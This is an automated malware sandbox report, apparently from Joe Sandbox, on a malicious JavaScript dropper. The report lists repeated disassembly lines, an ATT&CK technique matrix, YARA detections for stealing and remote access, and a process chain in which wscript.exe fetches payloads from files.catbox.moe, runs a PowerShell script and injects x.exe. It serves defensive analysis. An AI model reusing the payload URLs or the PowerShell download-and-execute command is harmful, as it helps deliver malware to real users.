          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A15F4 mov eax, dword ptr fs:[00000030h]4_2_019A15F4
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]4_2_01A535D7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]4_2_01A535D7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A535D7 mov eax, dword ptr fs:[00000030h]4_2_01A535D7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]4_2_019BC5ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BC5ED mov eax, dword ptr fs:[00000030h]4_2_019BC5ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019825E0 mov eax, dword ptr fs:[00000030h]4_2_019825E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE5E7 mov eax, dword ptr fs:[00000030h]4_2_019AE5E7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2F525 mov eax, dword ptr fs:[00000030h]4_2_01A2F525
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3B52F mov eax, dword ptr fs:[00000030h]4_2_01A3B52F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A55537 mov eax, dword ptr fs:[00000030h]4_2_01A55537
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B7505 mov eax, dword ptr fs:[00000030h]4_2_019B7505
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B7505 mov ecx, dword ptr fs:[00000030h]4_2_019B7505
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AE53E mov eax, dword ptr fs:[00000030h]4_2_019AE53E
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A54500 mov eax, dword ptr fs:[00000030h]4_2_01A54500
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BD530 mov eax, dword ptr fs:[00000030h]4_2_019BD530
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BD530 mov eax, dword ptr fs:[00000030h]4_2_019BD530
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990535 mov eax, dword ptr fs:[00000030h]4_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198D534 mov eax, dword ptr fs:[00000030h]4_2_0198D534
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]4_2_01988550
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01988550 mov eax, dword ptr fs:[00000030h]4_2_01988550
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BB570 mov eax, dword ptr fs:[00000030h]4_2_019BB570
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BB570 mov eax, dword ptr fs:[00000030h]4_2_019BB570
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B656A mov eax, dword ptr fs:[00000030h]4_2_019B656A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B562 mov eax, dword ptr fs:[00000030h]4_2_0197B562
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A0A4B0 mov eax, dword ptr fs:[00000030h]4_2_01A0A4B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197B480 mov eax, dword ptr fs:[00000030h]4_2_0197B480
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01989486 mov eax, dword ptr fs:[00000030h]4_2_01989486
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01989486 mov eax, dword ptr fs:[00000030h]4_2_01989486
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B34B0 mov eax, dword ptr fs:[00000030h]4_2_019B34B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B44B0 mov ecx, dword ptr fs:[00000030h]4_2_019B44B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019864AB mov eax, dword ptr fs:[00000030h]4_2_019864AB
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A294E0 mov eax, dword ptr fs:[00000030h]4_2_01A294E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019804E5 mov ecx, dword ptr fs:[00000030h]4_2_019804E5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A554DB mov eax, dword ptr fs:[00000030h]4_2_01A554DB
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A340D mov eax, dword ptr fs:[00000030h]4_2_019A340D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BA430 mov eax, dword ptr fs:[00000030h]4_2_019BA430
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197C427 mov eax, dword ptr fs:[00000030h]4_2_0197C427
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A245A mov eax, dword ptr fs:[00000030h]4_2_019A245A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197645D mov eax, dword ptr fs:[00000030h]4_2_0197645D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198B440 mov eax, dword ptr fs:[00000030h]4_2_0198B440
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A5547F mov eax, dword ptr fs:[00000030h]4_2_01A5547F
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information32
          Scripting
          Valid Accounts1
          Exploitation for Client Execution
          32
          Scripting
          211
          Process Injection
          1
          Masquerading
          OS Credential Dumping21
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          PowerShell
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion
          Security Account Manager41
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          TT copy.js3%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://files.catbox.moe;0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          files.catbox.moe
          108.181.20.35
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://files.catbox.moe/t7rwbh.txtfalse
              high
              https://files.catbox.moe/ugok5m.ps1false
                high
                https://files.catbox.moe/0hc11b.txtfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://files.catbox.moe;wscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://files.catbox.moe/ugok5m.ps1uwscript.exe, 00000000.00000003.1808548812.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723248018.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1723320024.000001E28D5AE000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://files.catbox.moe/0hc11b.txt%Operationx.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.drfalse
                            high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1778463096.000001832437A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.000001833290C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.1798425679.0000018332A42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://oneget.orgXpowershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://files.catbox.moe/wscript.exe, 00000000.00000002.1810546269.000001E28D804000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://files.catbox.moewscript.exe, 00000000.00000002.1809879390.000001E28B734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1809160897.000001E28D7F5000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E39000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1778463096.0000018322891000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1842412077.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1778463096.0000018324206000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://oneget.orgpowershell.exe, 00000001.00000002.1778463096.0000018323DE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs
                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    108.181.20.35
                                                    files.catbox.moeCanada
                                                    852ASN852CAfalse
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1578023
                                                    Start date and time:2024-12-19 07:49:06 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 38s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • GSI enabled (Javascript)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:TT copy.js
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winJS@8/7@1/1
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 29
                                                    • Number of non-executed functions: 226
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .js
                                                    • Stop behavior analysis, all processes terminated
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target powershell.exe, PID 6896 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    TimeTypeDescription
                                                    01:50:06API Interceptor8x Sleep call for process: powershell.exe modified
                                                    01:50:10API Interceptor28x Sleep call for process: x.exe modified
